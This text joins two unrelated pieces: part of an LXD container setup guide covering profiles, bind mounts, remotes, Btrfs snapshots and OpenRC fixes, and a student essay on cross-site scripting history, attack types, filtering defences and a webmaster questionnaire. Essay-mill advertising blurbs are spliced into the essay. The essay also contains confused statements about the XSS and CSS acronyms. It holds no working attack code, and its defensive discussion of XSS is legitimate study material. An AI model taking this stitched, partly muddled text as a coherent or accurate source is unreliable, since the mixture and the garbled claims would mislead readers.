Creating mycentos6 done. Starting mycentos6 done.
user $
lxc list
+-----------+---------+----------------+------+-----------+-----------+ | NAME | STATE | IPV4 | IPV6 | EPHEMERAL | SNAPSHOTS | +-----------+---------+----------------+------+-----------+-----------+ | mycentos6 | RUNNING | 192.168.43.240 | | NO | 0 | +-----------+---------+----------------+------+-----------+-----------+
A shell can be run in the container's context.
user $
lxc exec mycentos6 /bin/bash
[root@mycentos6 ~]# ps faux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 428 0.0 0.0 11500 2648 ? Ss 16:13 0:00 /bin/bash root 440 0.0 0.0 13380 1888 ? R+ 16:13 0:00 \_ ps faux root 1 0.0 0.0 19292 2432 ? Ss 16:03 0:00 /sbin/init root 188 0.0 0.0 4124 1316 console Ss+ 16:03 0:00 /sbin/mingetty --nohangup console root 228 0.0 0.0 9180 1392 ? Ss 16:03 0:00 /sbin/dhclient -H mycentos6 -1 -q -lf /var/lib/dhclient/dhclient-eth0.leases -pf /var/run/dhc root 278 0.0 0.0 171372 2544 ? Sl 16:03 0:00 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5 root 439 0.0 0.0 4120 1472 ? Ss 16:13 0:00 /sbin/mingetty --nohangup /dev/tty[1-6]
While the container sees its processes as running as the root user, running
ps on the host shows the processes running as UID 1000000. This is the advantage of unprivileged containers: root is only root in the container, and is nobody special in the host. It is possible to manipulate the subuid/subgid maps to allow containers access to host resources (for example, write to the host's X socket) but this must be explicitly allowed.
Configuration
Configuration of containers is managed with the
lxc config and
lxc profile commands. The two commands provide largely the same capabilities, but
lxc config acts on single containers while
lxc profile configures a profile which can be used across multiple containers.
Importantly, containers can be launched with multiple profiles. The profiles have a cascading effect so that a profile specified later in the list can add, remove, and override configuration values that were specified in a earlier profile. This can allow for complex setups where groups of containers can be specified which share some properties but not others.
user $
lxc profile list
default migratable
user $
lxc profile show default
name: default config: {} devices: eth0: nictype: bridged parent: lxcbr0 type: nic
The default profile is applied if no profile is specified on the command line. In the quick start, the
lxc launch omitted the profile, and so was equivalent to:
user $
lxc launch images:centos/6/amd64 mycentos6 --profile default
Notice that that the default profile only specifies that a container should have a single NIC which is bridged onto an existing bridge lxcbr0. So, having a bridge with that name is not a hard requirement, it just happens to be named in the default profile.
Available configuration includes limits on memory and CPU cores, and also devices including NICs, bind mounts, and block/character device nodes.
Configuration is documented in /usr/share/doc/lxd-0.16/specs/configuration.md (substitute the correct version of course).
All documented configuration options are not yet implemented, and only by inspecting source code can a user know which devices might be expected to work. For example, at the time of this writing:
- The only legal nictype for an interface is "bridged"
- The "disk" device type can only perform bind mounts, and only on a directory.
- Setting limits.memory seems not to work, although limits.cpus does
Example
Here a container is launched with the default profile and also a "cpusandbox" profile which imposes a limit of one CPU core. A directory on the host is also bind-mounted into the container using the container-specific
lxc config command.
First, prepare a reusable profile.
user $
lxc profile create cpusandbox
Profile cpusandbox created
user $
lxc profile set cpusandbox limits.cpus 1
lxc config requires a container name, so a container is initialized.
user $
lxc init 8e54c679f1c2 confexample --profile default --profile cpusandbox
Creating confexample done.
The 8e54c679f1c2 argument represents an image fingerprint obtained with
lxc image list. It's possible to give friendly aliases to images.
In the quick start above the
lxc launchwas invoked, which is a shorthand to
lxc initfollowed by
lxc start. The latter is used in this example so that
lxc configcan be invoked before the container is first started.
In this example a host directory /tmp/shared is bind-mounted into the container at /tmp. While this could be configured in a profile, instead it will be considered an exclusive feature for that container.
user $
mkdir /tmp/shared
user $
touch /tmp/shared/hello.txt
Set the directory to be owned by the container's root user (really UID 1000000 in the host).
user $
sudo chown -R 1000000:1000000 /tmp/shared
user $
lxc config device add confexample sharedtmp disk path=/tmp source=/tmp/shared
Device sharedtmp added to confexample
user $
lxc start confexample
user $
lxc exec confexample ls /tmp
hello.txt
Multi-host setup
Two hosts on a network, alpha and beta, are running the lxd daemon. The goal is to run commands on alpha which can manipulate containers and images on either alpha or beta.
Resolvable names are prepared for readability but it also works to use IP addresses.
Setup
Configure the daemon on the remote to listen over HTTPS instead of the default local Unix socket.
beta $
lxc config set core.https_address beta:8443
Restart the daemon after this step, and be sure that the firewall will accept incoming connections as specified.
On beta configure a trust password, which is only used until certificates are exchanged.
beta $
lxc config set core.trust_password Sieth9gei7ahm2ra
Add the beta remote to alpha.
alpha $
lxc remote add beta
Certificate fingerprint: 7a 76 5b c6 c6 eb 4e db 20 7f 31 bb 1d 11 ca 2d c5 d8 7d cf 41 c0 a0 1f aa 8b c3 f0 18 79 d3 a3 ok (y/n)? y Admin password for beta: Client certificate stored at server: beta
Result
It is now possible to perform actions on beta from alpha using the remote: syntax
alpha $
lxc list beta:
alpha $
lxc remote list beta:
alpha $
lxc launch beta:centos6 beta:container0
alpha $
lxc info beta:container0
To copy containers or images, the source ("from") host must have its daemon listening via HTTPS not Unix socket.
alpha $
lxc image copy beta:gentlean local:
alpha $
lxc image copy centos6 beta:
error: The source remote isn't available over the network
As long as commands were run from alpha, it was never necessary to add alpha as a remote to either host. It was also not necessary to change alpha's core.https_address config setting to use HTTPS instead of Unix socket unless it is the source of a container or image copy.
Configuration settings and profiles are only set on the local host. They can be copied to remotes but this is manual and error-prone unless configuration managment tools are used to propagate these values. Consider requiring all commands to be run from a single host with its local config database for ease of administration.
Advanced features
Live migration
TODO
Automatic BTRFS integration
When LXD detects that /var/lib/lxd is on a Btrfs filesystem, it uses Btrfs' snapshot capabilities to ensure that images, containers and snapshots share blocks as much as possible. No user action is required to enable this behavior.
When the container was launched in the Quick Start section above LXD created subvolumes for the image and container. The container filesystem is a copy-on-write snapshot of the image.
root #
btrfs subvolume show /var/lib/lxd/images
/8e54c679f1c293f909c66097d97de23c66a399d2dc396ade92b3b6a /var/lib/lxd/images/8e54c679f1c293f909c66097d97de23c66a399d2dc396ade92b3b6aae1c732fe.btrfs Name: 8e54c679f1c293f909c66097d97de23c66a399d2dc396ade92b3b6aae1c732fe.btrfs UUID: 5530510e-2007-f146-9e0b-8c05480d63de Parent UUID: - Received UUID: - Creation time: 2015-09-04 15:03:32 -0500 Subvolume ID: 330 Generation: 4518 Gen at creation: 4517 Parent ID: 5 Top level ID: 5 Flags: - Snapshot(s): var/lib/lxd/containers/mycentos6
Making a snapshot of the running container filesystem creates another copy-on-write snapshot.
user $
lxc snapshot mycentos6 firstsnap ID 332 gen 4584 top level 5 path var/lib/lxd/snapshots/mycentos6/firstsnap
root #
btrfs subvolume show /var/lib/lxd/containers/mycentos6
/var/lib/lxd/containers/mycentos6 Name: mycentos6 UUID: fe6bfd65-d911-e449-a1df-be42d2997f4a Parent UUID: 5530510e-2007-f146-9e0b-8c05480d63de Received UUID: - Creation time: 2015-09-04 15:03:39 -0500 Subvolume ID: 331 Generation: 4595 Gen at creation: 4518 Parent ID: 5 Top level ID: 5 Flags: - Snapshot(s): var/lib/lxd/snapshots/mycentos6/firstsnap
/dev/lxd/sock
A socket is bind-mounted into the container at /dev/lxd/sock. It serves no critical purpose, but is available to users as a means to query configuration information about the container.
Troubleshooting
Cgroups inside Containers with OpenRC
As of 26th November 2017 there is an open bug with OpenRC (at least inside the container). Informations on the state of fixing and a workaround (or possible fix) can be found here: (includes patching and init file). Setting rc_sys="" inside the container works, too, but might break other things.
Proceed at own risk and create backups ;-)
Containers not starting under OpenRC
Recent OpenRC release brought "unified" cgroups and LXD doesn't seem to like that (it runs well under systemd which also has unified cgroups though...). The workaround for that is to disable unified cgroups. You do that by editing
/etc/rc.conf and setting
rc_cgroup_mode="legacy".
Running systemd based containers on OpenRC hosts
To support systemd for e.g. ubuntu container there are two distinct changes necessary: a) Mount the host's cgroups automagically into the container
user $
lxc config set <container> raw.lxc 'lxc.mount.auto = cgroup'
b) Create the system cgroup directory on the host and mount the cgroup there:
root #
mkdir -p /sys/fs/cgroup/systemd
root #
mount -t cgroup -o none,name=systemd systemd /sys/fs/cgroup/systemd
For more details take a look a the upstream issue on github.com | https://wiki.gentoo.org/wiki/LXD | CC-MAIN-2018-30 | refinedweb | 2,611 | 52.49 |
![ Cover image for
Best TypeScript Courses to take up this lockdown season!]()
Disclosure: This post includes affiliate links; our team may receive compensation if you purchase products or services from the different links provided in this article.
Typescript is a 'super-set' of Javascript. That means that if you already know Javascript, you are ready to take this course. Typescript adds in several important features to Javascript, including a type system. This type of system is designed to help you catch errors during development, rather than when you are running your code. That means you will be twice as productive by catching bugs earlier in development. But besides the type system, Typescript also provides several tools for structuring large codebases and writing truly reusable code.
TypeScript is an open-source language that provides support for building enterprise-scale JavaScript applications. Although several patterns exist that can be used to structure JavaScript, TypeScript provides container functionality that object-oriented developers are familiar with, such as classes and modules. It also supports strongly-typed code to ensure inappropriate values aren't assigned to variables in an application.
Thus, considering the dynamic nature and adaptability of Typescript, we have curated a list of Best Typescript Courses that you must take up in order to learn the skill.
1. Learn TypeScript (Ditch JavaScript)
Don't limit the Usage of TypeScript to Angular! Learn the Basics, its Features, Workflows and how to use it!
Course rating: 4.7 out of 5.0 ( 13,548 Ratings total)
In this course, you.
You can take Learn TypeScript (Ditch JavaScript) Certificate Course on Udemy .
2. TypeScript Fundamentals
TypeScript Fundamentals walks you through the key concepts and features that you need to know to get started with TypeScript, and use it to build large (and small) scale JavaScript applications. Updated March 25, 2016 for TypeScript 1.8.
Course rating: 4.5 out of 5.0 ( 1847 Ratings total)
In this course, you will :
- Walk through the key concepts and features that you need to know to get started with TypeScript,
- and use it to build enterprise scale JavaScript applications.
- You will learn the role that TypeScript plays as well as key features that will help jump-start the learning process.
You can take TypeScript Fundamentals Certificate Course on Pluralsight .
3. Typescript: The Complete Developer's Guide [2020]
Master Typescript by learning popular design patterns and building complex projects. Includes React and Express!
Course rating: 4.7 out of 5.0 ( 3,297 Ratings total)
In this course, you will :
- Master design patterns for building large applications.
- Integrate Typescript into React/Redux or Express projects.
- Understand Composition vs Inheritance, and when to use each.
- Write reusable code powered by classes and interfaces.
- Assemble reusable boilerplates for your own Typescript projects.
You can take Typescript: The Complete Developer's Guide [2020] Certificate Course on Udemy .
4. TypeScript In-depth
This course will help you learn all of the major language features in the latest versions of TypeScript.
Course rating: 5.0 out of 5.0 ( 446 Ratings total)
In this course, you will :
- Learn TypeScript basics such as the new syntax for variable declarations
- and progress through all of the major features of the language including arrow functions, interfaces, classes, modules, namespaces, and generics.
- Along the way, you will learn not only the syntax, but also the benefits of the strong-typing support in TypeScript. TypeScript is an amazing language that compiles to JavaScript and is a perfect tool for building both client and server-side web applications.
You can take TypeScript In-depth Certificate Course on Pluralsight .
5. Introduction to TypeScript Development
Get ready to build Angular 2 web and mobile applications by learning the TypeScript programming language.
Course rating: 4.4 out of 5.0 ( 1,239 Ratings total)
In this course, you will :
- Be ready to move onto building Angular 2 applications..
- Code with the TypeScript programming language..
- Work with TypeScript classes and object oriented programming concepts.
- working with closures, object oriented programming, real time asynchronous development, and decorators.
You can take Introduction to TypeScript Development Typescript Courses.
In case you liked this article, you can also visit the following posts of mine;
Also, I would love to hear any feedback and review from you. Please tell me what you liked in the comment section below. Happy Learning!✨
Posted on Jun 25 by:
Devansh Agarwal
Software Engineer || Technical Writer || Social Evangelist
Discussion | https://dev.to/coursesity/typescript-best-courses-to-learn-2020-1723 | CC-MAIN-2020-29 | refinedweb | 734 | 57.98 |
A Mac Sub Layer And The Physical Computer Science Essay
Published:
The present report predicts that fully and semi-automated techniques will aggressively emerge for targeting and hijacking web applications using XSS, thus eliminating the advantages of active human exploitation. A few of these techniques are detailed together with solutions and workarounds for web application developers and users. The results from Questionnaire were analysed and compared with the website used to test XSS injection defences before and after of PHP improvements.
The browsers which were used for testing XSS defences are Internet explorer version 10.0.9200.16521, Firefox version 19.0.2 and Chrome version 25.0.1364.172 m. The end results are the same were some of the activities were handled different in Chrome than the other browsers. It also depends from the enabled plug-ins of each browser already has or configured from an IT expert.
Cross Site Scripting vulnerabilities go back to 1996, during the early events of the World Wide Web (WWW).A period when e-commerce did start to lift off, the reborn days of Yahoo, Netscape and the revolting blink label. When hundreds of thousands of WebPages were under construction, plagued by the tiny yellow street signs, along with the Websites used HTML Frames (Hypertext Markup Language). The programming of JavaScript language hit the scene, a mysterious forerunner of XSS (Cross Site Scripting), altered the security of web application eternally. JavaScript allowed template designers to make interactive Website effects including image rollovers, floating menus, and also the despised pop-up window. Unimpressive by today�s Asynchronous JavaScript and XML (AJAX) application standards, but soon enough hackers have discovered a whole new unexplored world of possibilities. They have also found out that when unsuspected users visited their WebPages they might forcibly load any site (online stores, bank, Web mail, etc) into an HTML Frame inside proper browser window. Thereafter, by using JavaScript, they can cross the border backward and forward in the sites, and study derived from one of frame into the other. They could actually steal passwords which were typed into HTML Forms, as well as cookies, or conciliation of any confidential information on the screen. The media have reported the challenge as being an Internet browser foible. Netscape Communications, the predominant internet browser vendor, fought back by implementing the same-origin policy, an insurance policy restricting JavaScript on one Web page from accessing data from another. Internet browser XSS hackers took this as a challenge and started uncovering many intelligent solutions to deceive the constraint (Grossman, J., 1999).
Professional
Essay Writers
Get your grade
or your money back
using our Essay Writing Service!
David Ross, in December 1999, ran security reply at Microsoft for Internet Explorer. He was infused from the work of Georgi Guninski who was simply at that time finding flaws in Traveler�s security model. Ross demonstrated that Content could expose Script Injection effectively bypassing precisely the same security guarantees bypassed by Guninski�s Web Browser code flaws, but where the fault gave the impression to exist around the server side rather than the client side i.e. code. David described this inside a Microsoft-internal paper entitled �Script Injection�. The paper described the matter, how it is exploited, what sort of attack can be persisted using cookies, the way XSS (cross site scripting) virus permitted to work and Input/Output (I/O) filtering solutions could be found (Jeremiah, G., et al. 2007).
Finally, the above concept was shared with CERT� Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests. The purpose of this was to let the public know so the issue will be revealed within a responsible way and sites would get fixed, not simply at Microsoft, but additionally through the business. In the discussion back in mid-January, the team in charge has chosen XSS (Cross Site Scripting) from the rather humorous report on proposals which are stated below:
� Unauthorized Site Scripting
� Unofficial Site Scripting
� Uniform Resource Locator (URL) Parameter Script Insertion
� Cross-site Scripting
� Synthesized Scripting
� Fraudulent Scripting
On 25th of January 2000, Microsoft met with the (CERT) Computer Emergency Response Team, various vendors for example Apache, and also other interested parties in a hotel in Bellevue, WA to go over the idea. Ross re-wrote the inner paper with the aid of John Michael Roe, Coates and Ivan Brugiolo, in a way to be well suited for public release. In coordination with Computer Emergency Response Team, Microsoft has communicated this paper along with other materials on February 2000. Sometime during modern times the paper was removed by Microsoft.com. However, nothing ever dies on Internet. It is now available at a website called (Carnegie Mellon University, 2000).
Comprehensive
Writing Services
Plagiarism-free
Always on Time
Marked to Standard
Meanwhile, hackers of some other sort have developed a playground of HTML boards, discussion boards, guest books, and Web mail providers anywhere where they may submit text laced with JavaScript and HTML into an internet site for infecting website members. That's where the attack name �HTML Injections� arises from.
The hackers made rudimentary ways of JavaScript malware (malware) that they can submitted into HTML forms to improve screen names, steal cookies, adjust the net page's colours proclaim virus launch warnings, spoof derogatory messages, along with other vaguely malicious digital mischief. Soon enough another variant of the identical attack surfaced. With many social engineering, it turned out that by tricking a user to select an exclusively crafted malicious link would yield the identical results as HTML Injection. People might have no method of self-defence apart from to switch off to JavaScript.
Over the years, after the time it was originally regarded as XSS cross-site scripting, it became simply referred as a Browser vulnerability without special name. The fact that was HTML Injection and malicious linking are what�s now called variants of cross-site scripting, or persistent and non-persistent cross-site scripting, respectively. Unfortunately, this is the main reason that everybody is confused from the muddled terminology. Matters can be made worse, the acronym CSS was regularly wrongly identified as another recently born internet browser technology, a foretime claiming these-letter convention, Cascading Style Sheets. Finally, a brilliant person advised changing the XSS (cross-site scripting) acronym to XSS in order to avoid confusion. And exactly like that, it stuck. XSS (cross site scripting) had its identity. Lots of freshly minted white papers along with a sea of vulnerability advisories flooded the space describing its potentially devastating impact. Few would listen (Carnegie Mellon University, 2000).
Just before 2005, nearly all security experts and developers paid little care about XSS. The main focus transfixed on buffer overflows, botnets, viruses, worms, spyware, and others. Meanwhile, one million new Web servers appear globally every month turning perimeter firewalls into Swiss cheese and rendering SSL (Secure Sockets Layer) as peculiar. Most believed JavaScript, the enabler of XSS (cross site scripting), became the next programming language. It can�t root a practical system or exploit a database, so why must I care? How dangerous could simply clicking a web link or going to a Website really be? In October of 2005, we've got the result. Literally overnight the Samy Worm, the 1st major XSS worm, was able to shut down the most popular social networking Web page MySpace. The payload being almost benign, the Samy Worm is built to spread from just one MySpace page to a different, finally infecting more than a million users within a day. Suddenly the protection world was fully awake and research into JavaScript malware break out. A couple of short months later in early 2006, intranet hacks, JavaScript port scanners, browser history stealers and keystroke Trojan horses entered to create a lasting impression. Numerous XSS vulnerabilities appeared to be disclosed in leading Web sites and criminals have began combining in phishing scams with an effective fraud cocktail. Unsurprising, since they were based on WhiteHat Security greater than 70 % net sites are vulnerable. Common Vulnerabilities and Exposures project (CVE), a wordbook of publicly known vulnerabilities in commercial and open source products, stated XSS had overtaken buffer overflows being the most important most discovered vulnerability. XSS arguably stands because one of the most potentially disastrous vulnerability confronts information security and online businesses. These days, when audiences are asked when they have got word of XSS, the hands of most people will rise (Schiller, G., et al, 2008).
Cross Site Scripting (CSS in short, but not abbreviated as XSS) is among the most common application level attacks which hackers use to sneak into web applications today. Cross site scripting (XSS) is surely an attack around the privacy of clients of the particular site be responsible for a total breach of security when customer data is stolen or manipulated. Unlike most attacks, that entail two parties - the attacker, and the web page, or even the attacker as well as the victim client, the CSS (Cross site scripting) attack involves three parties � firstly, the attacker, the site and a client. The objective of the CSS attack is to steal the consumer cookies, or any other sensitive information, that may find out the client with the web page. Together with the token in the legitimate user taking place, the attacker can act as the user in interaction together with the site - specifically, impersonate the person. As an example, in a single audit accompany for the large company it was easy to peek on the user�s charge card number and personal information utilizing a CSS attack. It was achieved by running malicious JavaScript code with the victim (client) browser, with all the access privileges with the site. These are the not a lot of JavaScript privileges which generally don't let the script access far from site related information. It needs to be stressed that even though vulnerability exists at the web page, never is the web page directly harmed. Yet that is enough to the script to get the cookies and send the crooks to the attacker. The actual result, the attacker steals the cookie sessions and impersonates the victim (Jovanovic, N., et. al., 2006).
This Essay is
a Student's Work
This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.Examples of our work
Therefore, the questions raised for this report are basically how a Cross-site scripting (XSS) defence can be improved to prevent XSS injections and do the survey based methodologies can be used to defend against cross site scripting injections?
This report is aiming to show the ranges of defences� strategies dealing with XSS (Cross Site Scripting) attacks and how websites can be protected from XSS injections. In addition, it will show a variety of techniques which can be used to protect websites by developing a website for testing XSS injections. It will involve testing and running improved PHP code for XSS defences. This will be achieved by designing online questionnaire to obtain information regarding how webmasters think about XSS injections.
Explanation
Let us call the web page under attack:. (This site is used for test XSS Injections).Fundamentally of a traditional CSS attack lays a vulnerable script inside the vulnerable website. This script reads section of the HTTP request (normally the parameters, but not also path or HTTP headers) and it is returning to the response page, in full or perhaps part, without first sanitizing it. Making sure it doesn�t contain HTML tags and/or JavaScript code.
During this period there are a number of objective which have to be identified and analysed. Firstly, to define a definition of techniques to defend against cross-site scripting techniques. A number of techniques to how-to develop XSS defences properly and what kind of internet security softwares available to defend and protect against XSS attacks.
The structure of XSS attacks and how it works and lastly, implement and analyse a series of questions to collect opinions and viewpoints of webmasters.
According to Cook, S., (2003), cross site scripting (XSS) attacks are those in which attackers inject malicious code, usually client-side scripts, into web applications, forms, from outside sources. Due to the number of possible injection locations and techniques, many applications are vulnerable to this attack method. Scripting attacks differ from other web application vulnerabilities because it attacks an application's users, not an application's infrastructure, but they can still cause a great deal of damage. This paper describes how cross-site scripting works and what makes an application vulnerable, along with suggestions for web developers about improved XSS defenses to be used merely and wisely for their website's benefits against successful cross-site scripting attacks.
2.1 Cross site scripting Description
As outlined by Imperva (2013), (XSS or CSS) Cross-site scripting is an attack which utilizes a site vulnerability the location where the site displays content which also includes un-sanitized user-provided data. For instance, an attacker might place a hyperlink by having an embedded malicious script into a web-based discussion forum. That reason for the malicious script is usually to attack other forum users who get lucky and decide to click on the hyperlink. As an example, it might copy user cookies then send those cookies to the attacker.
Web sites today tend to be more complex than ever before and often contain dynamic content to boost the user experience. Dynamic content articles are achieved by making use of Web applications that can deliver happy to an individual as outlined by their settings and requirements.
While effecting different user customizations and tasks, more and more websites take input parameters coming from a user and get rid of it for the user, usually as a reaction to precise the same page request. Instances of such behavior are the following:
1. Search engines like yahoo which present the search term from the title ("Search Engine Results for: search_term")
2. Error messages that incorporate the erroneous parameter
3. Personalized responses ("Hello, username")
XSS (Cross site scripting) attacks occur when an opponent uses such applications and produces a request with malicious information (for example a script) which is later presented to an individual requesting it. The malicious content is usually embedded in to a hyperlink, positioned so your user will see it in a site, a web site message board, an email, or perhaps an instant message. If your user then follows the web link, the malicious info is sent to the Web application, which experts claim creates an output page to the user, including the malicious content. The person, however, is commonly not aware of the attack, and assumes the data originates online server itself, leading an individual to trust this is valid content on the internet site (Imperva, 2013).
2.2 Consequences of an attack
XSS code may be crafted to lift a number of sensitive data including any information presented for a passing fancy page the place that the cross-site code was planted. Though, the biggest risk could be the thievery of (UAC) user authentication credentials.
Many websites save session or authentication credentials inside a browser cookie. Malicious code can steal this cookie session and send it to some server controlled through the attacker. Achievable cookie in hand, the attacker could possibly access the same internet site masquerading as a victim user, bypassing any login.
Whether or not the compromised site will not provide use of highly sensitive information like finances or email, a hacker could probably access personal information that could be leveraged against a more sensitive website for example the user�s webmail account.
Malicious code may also be meant to modify the content about the page given to the web page visitor. One nasty trick is always to customize the destination of a link about the page (or present a fresh link that this visitor is directly driven to click), decoying them into traversing to a malicious website fully engineered with the attacker to file for an even more serious attack (Weiss, A., 2012).
Alternatively, an opponent would use an XSS (Cross site scripting) attack contrary to the site owner instead of the site visitor. The identical trick of altering output enables hackers to vandalize content, make a news site the place that the XSS attack defaces headlines and undermines the reliability of the site (Imperva, 2013).
2.3 Defending against XSS (Cross Site scripting) injections.
Finally, XSS code injection is as much the same as naturally to SQL injection. Similar protecting against any code injection attack, the very best defence is thorough and well-tested sanitation of every user input.
Webmasters need to define every input path through which their internet site accepts incoming data. Each path has to be hardened contrary malicious data that will represent executable code. Regularly this implies implementing multiple filters along the communication pathway as an example, an online application firewall for instance ModSecurity plus input sanitization into server-side input processing code.
Developers are also able to use tools for example XSS domsnitch for Google Chrome or ME for Firefox to attempt to try their very own sites for XSS vulnerabilities.
For a secondary defence, a website could link browser cookie credentials to the users IP (Internet Protocol). Without an ideal defence, this could anticipate easy misappropriation of users� cookies. An opponent could engineer a process to lift you IP and spoof their unique actions under that address. However, this level of attack will likely be much less widespread than simple cookie theft (Weiss, A., 2012).
2.4 Types of cross site scripting
According to Owasp (2013), there are presently three major categories of cross site scripting. Many people could possibly discover down the road, however, so don't think this type of manhandle of Site vulnerability is necessarily limited by these 3 types.
1. Reflected
By far, the most frequent type of cross-site scripting exploit will be the reflected exploit. It targets vulnerabilities that happen in some websites when data submitted through the client is instantly processed from the server to build results. These can be then sent back towards the browser about the client system. An exploit works if it can send code on the server that is included in the Website results repaid for the browser. When those email address details are sending the code it isn't just encoded using HTML special character encoding, thus being interpreted from the browser instead of being displayed as inert visible text. The commonest way to take advantage of this exploit possibly involves a hyperlink utilizing a malformed URL, so that a flexible creation in a Hyperlink to show up around the webpage containing malicious code. Simple things like another URL utilized by the server-side code to generate links around the page, or perhaps a user�s name to be within the text page so the user could be greeted by name, can be a vulnerability used in a reflected cross-site scripting exploit.
2. Stored
Also referred to as HTML injection attacks, stored XSS (Cross Site Scripting) exploits, include the types where some data delivered to the server is stored usually within a database to use in the roll-out of pages which will be served with other users later. This type of cross-site scripting exploit could affect any visitor at your web site, if your website is susceptible to a stored XSS (cross site scripting) foible. The classic demonstration of this kind of vulnerability is content store for example forums and advertising boards where users may use raw XHTML and HTML to format their posts. Just like preventing reflected exploits, the true secret to secure your web site against stored exploits is making certain all submitted info is translated to produce entities before showing up to ensure it will not be interpreted from the browser as code.
3. DOM based
A neighborhood cross-site scripting exploit targets vulnerabilities inside the code of your web site itself. These vulnerabilities are the result of unsheltered technique Document Object Model in JavaScript to ensure opening another Web site with malicious JavaScript code within it simultaneously could possibly alter the code in page one for the neighborhood system. In older versions of Web Browser (before IE 6 on Microsoft Windows Service Pack 2), which can also be utilized on local Websites (stored on the local computer instead of retrieved from virtual reality), and through those same pages rescue their life from the browser sandbox to customize the local system along with the user privileges accustomed to run the browser. Since the majority Microsoft Windows users have inclined to run everything because the Administrator account, this effectively meant local XSS (cross site scripting) exploits on Microsoft Windows earlier versions of Windows XP Service Pack 2 could be a single thing.
In the local XSS (cross-site scripting) exploit, unlike stored and reflected exploits, no malicious code is distributed towards the server in any way. The behavior in the exploit happens seen on the neighborhood client system; nevertheless it alters all pages supplied by the otherwise benign Website before they're interpreted from the browser so they really work as though they carried the malicious payload towards the client through the server. Because of this server-side protections that get rid of or block malicious cross-site scripting won't assist these kinds of exploit.
Filter input parameters for special characters.
Input filtering functions by taking away some or all special characters such as (',",<>,$,&,^, etc) data that users have supplied mainly because it gets in the server-side application components. Although it's simple to implement client-side input filtering, this will not be relied upon since it is often an insignificant exercise with an attacker to bypass it. Regardless if implemented in the server-side, the client-side processes should perform exactly the same input filtering processes.
The suggested approach to implementing input filtering is usually to only pick from the group of characters that is proven to be safe as an alternative to debarring the named special characters. This technique is referred to as Positive filtering, and also by only choosing the characters which might be acceptable, it can help to lessen a chance to take advantage of other yet not known vulnerabilities.
As an example, an application field that is certainly expecting a person's age could be limited by the pair of digits through 9. There isn't any reason for this age element to just accept any letters or some other special characters (Shiarla, M., (2003).
Filter output dependant on input parameters for special characters
Output filtering functions similarly to Input filtering, with the exception that special characters are filtered through the data on the server-side application before sending it to the consumer web browser. This method needs to be used when info is retrieved from storage formats or databases, particularly if there is a possibility that non-filtered content may have been added by system processes or different applications.
Addable care must be taken when you use Output filtering. In the event the application outputs HTML content, vigilance is necessary to make certain that special character filtering has limitations to data that is previously furnished by an individual and saved in a database. Filtering the special characters �<� and �>� prematurely in the act will probably render the customer HTML document useless (Shiarla, M., (2003).
2.5 Alternative XSS Vulnerabilities
Sharma, A., (2004) shows that search engines e.g. Yahoo that echo the search keyword that has been entered, can also be prone to such attacks. This is why malicious code may be injected as an element of the keyword search input which is executed if the user submits the search. Dangers may include accessing undesirable or private areas of your website. For example, shows a code snippet that executes code for the computer targeted. The attacker just injects HTML in this style.
Sharma, A., (2004) also states that an attacker can also send an e-mail with regards to banking. Consider the e-mail contains a hyperlink with a malicious script embedded in the URL. An individual could possibly be prompted to select the link and visit the website, by which the attacker can steal the user's log on information. The similar is factual with a dynamically generated page in case a link has malicious code inside it. Think about the demonstration of a URL that might take part in the page. When the attack contains the application showed a number of HTML, trouble may creep in. The two IMG and IFRAME tags enable a brand new URL to load while HTML is displayed.
The mostly attacked avenues on the net are search boxes and internet-based forums. An attacker injects between scripting tags malicious code which the Web page interprets and accepts, using APPLET or FORM tags, with regards to the web page used. Inserted malicious code can do many kinds of harm through stealing cookies or session information. Vulnerability of the sort is prevalent considering that a graphic and a webmaster need to have familiarity with many languages and technologies (to safeguard against attacks). Many languages -- JavaScript, CGI, ASP, HTML tags, even Perl - are suitable for those attacks (Sharma, A., 2004).
In the following section a brief analysis of questionnaire will be given and a number of XSS injections can be used to attack a website. Moreover a development of XSS defense is implemented and analyzed as well for website security purposes. Differences between the developed PHP code and before developing PHP code to defend the test website are represented with a number of specific XSS attacks used to inject the test website. An explanation of what each XSS attack does and the analysis of PHP code are represented in order to understand the methodology used for future purposes.
The purpose of this research is to discover a how XSS is handled to the end user through the questionnaire. The research aims to find out
a) If the survey based methodologies can be used to defend against cross site scripting injections.
b) How a Cross-site scripting (XSS) defense can be improved to prevent XSS injections.
3.1 Establishing the focus of the study
This is relatively straightforward, mainly because it stemmed from my curiosity about web developing as a personal need to explore and improve XSS defences since many XSS attacks have been seen the last decade. Also, in order to utilise strengths and knowledge and also for the research to get useful in my career and would be beneficial mostly for web developers as well.
3.1.1 Detail of the artefacts
A report to include the design and analysis of questionnaire as well as comparison of XSS attacks before and after PHP improvements. Tests of the vulnerable website with XSS injections and analysis represented in order to secure websites. Recommendations and proposed PHP code is developed and published.
3.1.2 Contribution- supporting information
Questionnaire results were gathered from questionnaire�s database and SPSS was used to analyse the collected information. SPSS is a software package for statistical analysis which is used for research and academic studies. PHP code used before XSS defends is developed after comprehensive research and can be seen at Appendix A Figure 1. Based on the questionnaire analysis improvements of the existing PHP code have been made to improve the defences against XSS injections. The website used for tests is still online and can be used for academic purposes and for personal experiences ( and). Testing and results using the research provided as well as evaluation and conclusions are introduced.
3.2 Questionnaire Analysis and implementation
This chapter describes the design and research methodology that was implemented to describe the use of XSS attacks defenses between user and website (server). It also includes a description of the research settings according to the questionnaire, the procedures to improve XSS defenses and data collection. A number of appendices are used to clearly show the difference between before and after XSS injection defenses. Finally, this chapter describes the instruments used as well as the data analysis procedures.
According to the online questionnaire, 10 questions were published to the public view (). Moreover, the answers of this questionnaire were selected from a group of webmasters who were invited to interact and share their knowledge to investigate and analysis the following results.
According to question number 1, a variety of ages are in a position to understand the use of XSS injections. The age groups which were selected are: 18-25 (15 people), 26 � 35 (17 people) and 36 � 40 (2 people). Younger people show more interest or experienced XSS injections in their life in contrast of people in the age group of 36+. This can be explained as the computer is a tool which is used in every day basis either from their home, university etc. Total number of people who interact with the questions is 34.
Question number 2 states the degree each person has in order to understand and analyse the use of their experience. The most selected answer is Undergraduate degree (21) where Postgraduate degree (7) comes second following with First year degree(4) and No degree(1). Those results were expected as Undergraduate degree people have the necessary knowledge to be in a position to understand the XSS injections. Moreover Postgraduate degree people focus on their studies on a selected topic and they are not as familiar as much as undergraduate people are with XSS injections.
